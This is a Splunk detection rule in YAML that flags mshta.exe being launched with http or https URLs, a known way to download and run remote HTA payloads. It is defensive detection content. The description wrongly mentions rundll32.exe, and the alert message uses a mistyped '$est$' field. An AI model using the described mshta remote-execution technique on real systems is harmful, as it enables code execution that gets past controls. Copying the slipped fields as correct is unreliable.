/
detect_mshta_url_in_command_line.yml
93 lines (93 loc) · 3.42 KB
/
detect_mshta_url_in_command_line.yml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
name: Detect MSHTA Url in Command Line
id: 9b3af1e6-5b68-11eb-ae93-0242ac130002
version: 2
date: '2021-09-16'
author: Michael Haag, Splunk
type: TTP
datamodel:
- Endpoint
description: This analytic identifies when Microsoft HTML Application Host (mshta.exe)
utility is used to make remote http connections. Adversaries may use mshta.exe to
proxy the download and execution of remote .hta files. The analytic identifies command
line arguments of http and https being used. This technique is commonly used by
malicious software to bypass preventative controls. The search will return the first
time and last time these command-line arguments were used for these executions,
as well as the target system, the user, process "rundll32.exe" and its parent process.
search: '| tstats `security_content_summariesonly` count values(Processes.process)
as process values(Processes.parent_process) as parent_process min(_time) as firstTime
max(_time) as lastTime from datamodel=Endpoint.Processes where `process_mshta` (Processes.process="*http://*"
OR Processes.process="*https://*") by Processes.user Processes.process_name Processes.parent_process_name
Processes.original_file_name Processes.dest | `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_mshta_url_in_command_line_filter`'
how_to_implement: To successfully implement this search you need to be ingesting information
on process that include the name of the process responsible for the changes from
your endpoints into the `Endpoint` datamodel in the `Processes` node. In addition,
confirm the latest CIM App 4.20 or higher is installed and the latest TA for the
endpoint product.
known_false_positives: It is possible legitimate applications may perform this behavior
and will need to be filtered.
references:
- https://github.com/redcanaryco/AtomicTestHarnesses
- https://redcanary.com/blog/introducing-atomictestharnesses/
- https://docs.microsoft.com/en-us/windows/win32/search/-search-3x-wds-extidx-prot-implementing
tags:
analytic_story:
- Suspicious MSHTA Activity
asset_type: Endpoint
automated_detection_testing: passed
cis20:
- CIS 8
confidence: 100
context:
- Source:Endpoint
- Stage:Defense Evasion
dataset:
- https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1218.005/atomic_red_team/windows-sysmon.log
impact: 80
kill_chain_phases:
- Exploitation
message: An instance of $parent_process_name$ spawning $process_name$ was identified
on endpoint $est$ by user $user$ attempting to access a remote destination to
download an additional payload.
mitre_attack_id:
- T1218
- T1218.005
nist:
- PR.PT
- DE.CM
observable:
- name: user
type: User
role:
- Victim
- name: dest
type: Hostname
role:
- Victim
- name: parent_process_name
type: Parent Process
role:
- Parent Process
- name: process_name
type: Process
role:
- Child Process
product:
- Splunk Enterprise
- Splunk Enterprise Security
- Splunk Cloud
required_fields:
- _time
- Processes.dest
- Processes.user
- Processes.parent_process_name
- Processes.parent_process
- Processes.original_file_name
- Processes.process_name
- Processes.process
- Processes.process_id
- Processes.parent_process_path
- Processes.process_path
- Processes.parent_process_id
risk_score: 80
security_domain: endpoint